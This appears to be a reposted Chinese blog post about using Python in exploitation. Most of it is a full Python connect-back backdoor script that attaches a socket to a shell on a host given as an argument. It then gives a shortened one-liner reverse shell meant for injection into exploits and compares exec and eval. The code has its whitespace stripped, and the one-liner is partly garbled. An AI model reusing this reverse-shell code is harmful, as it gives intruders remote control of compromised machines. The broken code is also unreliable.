在漏洞利用Python代码真的很爽

时间:2021-05-22

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
#PythonConnect-backBackdoor
#Author:wofeiwo<wofeiwo[0x40]gmail[0x2e]com>
#Version:1.0
#Date:July15th2006

importsys
importos
importsocket
shell="/bin/sh"

defusage(programname):
print"PythonConnect-backBackdoor"
print"Auther:wofeiwo<wofeiwo[0x40]gmail[0x2e]com>"
print"Date:July15th2006\n"
print"Usage:%s<conn_back_host><port>\n"%programname

defmain():
iflen(sys.argv)!=3:
usage(sys.argv[0])
sys.exit(1)

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print"[+]Connectok."
except:
print"[-]Couldnotconnectto%s:%s"%(sys.argv[1],sys.argv[2])
sys.exit(2)
s.send("--------------------PythonConnect-backBackdoor--------------------\n")
s.send("-----------------------------Bywofeiwo-----------------------------\n")
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
globalshell
os.system(shell)
print"SeeU!"
s.close()

if__name__=="__main__":main()



用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

importsys;importos;importsocket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((socket.gethostbyname("emymaster\\r\\n");os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);s.send("Isthereashell?\\r\\n");os.system("/bin/bash");s.close();s.send("Seeunexttime!\\r\\n");';


注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句



eval语句用来计算存储在字符串中的有效Python表达式



呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章